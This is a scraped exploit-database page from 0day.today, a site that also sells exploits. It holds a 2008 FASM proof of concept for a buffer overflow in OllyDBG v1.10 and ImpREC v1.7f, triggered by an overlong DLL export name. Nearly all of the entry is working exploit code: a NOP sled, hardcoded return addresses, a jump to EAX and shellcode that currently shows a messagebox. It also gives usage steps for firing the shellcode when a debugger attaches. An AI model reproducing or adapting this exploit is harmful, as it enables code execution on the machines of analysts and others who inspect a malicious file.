[ home ]  [ private ]  [ 0Day ]  [ discount ]  [ Get Gold ]  [ platforms ]  [ pentest ]  [ search ]  [ faq ]  [ contact ]  [ style ]  [ Prices in Gold ]   db: 39 583    
0day Today Exploit DB Official Facebook
0day Today Exploit DB Official Twitter
0day Today Exploit DB Official RSS Channel
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - Biggest Exploit Database in the World.
Select your language:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
Things you should know about 0day.today:
  • We use one main domain: http://0day.today
  • Most of the materials is completely FREE
  • If you want to purchase the exploit / get V.I.P. access or pay for any other service,
    you need to buy or earn GOLD
We accept currencies: [contact admin to find more]
           
We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
I am registered user of 0day.today. I don't want to see this screen in future.
What to do first?
  1. Read the [ agreement ]
  2. Read the [ Submit ] rules
  3. Visit the [ faq ] page
  4. [ Register ] profile
  5. Get [ GOLD ]
  6. If you want to [ sell ]
  7. If you want to [ buy ]
  8. If you lost [ Account ]
  9. Any questions [ admin@0day.today ]


Main links


You can contact us by

Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day Today Exploits Market and 0day Exploits Database

OllyDBG v1.10 and ImpREC v1.7f (export name) BOF PoC

Author
Defsanguje
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-7792
Category
local exploits
Date add
07-07-2008
Platform
unsorted
====================================================
OllyDBG v1.10 and ImpREC v1.7f (export name) BOF PoC
====================================================



;-------------------------------------------------------------------------;
; OllyDBG v1.10 and ImpREC v1.7f export name buffer overflow vulnerability
; PoC (probably older versions affected too, not tested though.)         
;
; Included shellcode shows a messagebox (WinXP SP2) and is configured for
; OllyDBG. See lines 60-105 for more details
;-------------------------------------------------------------------------;
; Usage:
; Load this DLL to your process and try to attach OllyDBG or ImpREC
; to it -> Shellcode executed >:)
;
; Shellcode gets fired also if program is run under OllyDBG.
;
; Bug discovered and PoC coded by:
; ~ Defsanguje, Defsanguje [at] gmail [dot] com             [July 7 2008]
;-------------------------------------------------------------------------;
; Coded in FASM
;-------------------------------------------------------------------------;

format PE GUI 4.0 DLL

include 'win32a.inc'
entry DllEntryPoint

section '.code' code readable executable

proc DllEntryPoint, hinstDLL,fdwReason,lpvReserved
                    mov eax, TRUE
                    ret
endp

;-------------------------------------------------------------------------;
; Modified version from original export-macro.
;-------------------------------------------------------------------------;
macro ExportExploit dllname,[label]
 { common
    local module,addresses,names,ordinal,count
    count = 0
   forward
    count = count+1
   common
    dd 0,0,0,RVA module,1
    dd count,count,RVA addresses,RVA names,RVA ordinal
    addresses:
   forward
    dd RVA label
   common
    names:
   forward
    local name
    dd RVA name
   common
    ordinal: count = 0
   forward
    dw count
    count = count+1
   common
    module db dllname,0
   forward
   
;-------------------------------------------------------------------------;
; Exploit for OllyDBG v1.10
;-------------------------------------------------------------------------;
a:  name\
    db 3e0h dup (90h)
    dd 6d553b78h                                                ; ESP to EBP
    dd 6d55e5ffh                                                ; EBP to EAX
    dd 0defdefdeh
    dd 0defdefdeh
    dd 6d56d25eh                                                ; add eax, 40h
    dd 0defdefdeh
    dd 6d52e1efh                                                ; jmp EAX =)
    db 40h-18h dup(90h)
c:  push eax
    mov eax, (ShellCodeStart-c) xor 0defdefdeh
    xor eax, 0defdefdeh
    add eax, [esp]
    jmp eax
b:  db 0bd0h - (ShellCodeEnd-ShellCodeStart) - (b-a) dup (90h)

ShellCodeStart:
    db 81h,0ECh,07Dh,0FFh,0FFh,0FFh
    db 2Bh,0C9h,51h,51h,51h,51h,51h,0BBh
    db 8Ah,05h,45h,7Eh                                          ; Address of messagebox in winxp sp2
    db 0FFh,0D3h
ShellCodeEnd:
    dd 0045F823h                                                 ; New EIP

    db 300h dup(90h)
    db 0

;-------------------------------------------------------------------------;
; Exploit for ImpREC v1.7f
;-------------------------------------------------------------------------;
;    name\
;    db 0C0Ch - (ShellCodeEnd-ShellCodeStart) dup (90h)
;ShellCodeStart:
;    db 81h,0ECh,07Dh,0FFh,0FFh,0FFh
;    db 2Bh,0C9h,51h,51h,51h,51h,51h,0BBh
;    db 8Ah,05h,45h,7Eh                                          ; Address of messagebox in winxp sp2
;    db 0FFh,0D3h
;ShellCodeEnd:
;    dd 12c1b8h                                                  ; New EIP
;    db 0
;-------------------------------------------------------------------------;
    
   common
    local x,y,z,str1,str2,v1,v2
    x = count shr 1
    while x > 0
     y = x
     while y < count
      z = y
      while z-x >= 0
       load v1 dword from names+z*4
       str1=($-RVA $)+v1
       load v2 dword from names+(z-x)*4
       str2=($-RVA $)+v2
       while v1 > 0
        load v1 from str1+%-1
        load v2 from str2+%-1
        if v1 <> v2
         break
        end if
       end while
       if v1<v2
        load v1 dword from names+z*4
        load v2 dword from names+(z-x)*4
        store dword v1 at names+(z-x)*4
        store dword v2 at names+z*4
        load v1 word from ordinal+z*2
        load v2 word from ordinal+(z-x)*2
        store word v1 at ordinal+(z-x)*2
        store word v2 at ordinal+z*2
       else
        break
       end if
       z = z-x
      end while
      y = y+1
     end while
     x = x shr 1
    end while }

section '.edata' export data readable
;-------------------------------------------------------------------------;
; Call the macro
;-------------------------------------------------------------------------;
  ExportExploit 'exploit.dll',\
        $
        
;-------------------------------------------------------------------------;



#  0day.today [2024-11-15]  #
0day Today Exploit Database buy and sell exploits type (local, remote, DoS, PoC, etc.)
Send all submissions to mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team